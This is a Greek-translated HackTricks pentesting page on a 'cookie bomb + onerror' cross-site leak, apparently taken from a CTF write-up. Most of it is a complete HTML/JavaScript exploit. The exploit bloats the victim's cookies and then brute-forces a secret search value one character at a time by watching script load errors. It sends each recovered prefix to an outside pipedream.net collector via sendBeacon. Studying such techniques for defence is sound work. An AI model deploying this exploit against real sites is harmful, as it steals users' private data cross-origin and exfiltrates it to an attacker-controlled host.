hacktricks/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

5.7 KiB
Raw Blame History

Βόμβα Cookie + Αποκάλυψη XS με Onerror

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Το παρακάτω σενάριο που προέρχεται από εδώ εκμεταλλεύεται μια λειτουργία που επιτρέπει στον χρήστη να εισάγει οποιοδήποτε ποσότητα cookies, και στη συνέχεια φορτώνει ένα αρχείο ως script, γνωρίζοντας ότι η πραγματική απόκριση θα είναι μεγαλύτερη από την ψευδή. Εάν επιτευχθεί, η απόκριση είναι μια ανακατεύθυνση με ένα URL αποτέλεσμα που είναι μεγαλύτερο, πολύ μεγάλο για να χειριστεί από τον διακομιστή, οπότε επιστρέφει έναν κωδικό κατάστασης σφάλματος http. Εάν η αναζήτηση αποτύχει, δεν θα συμβεί τίποτα επειδή το URL είναι σύντομο.

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!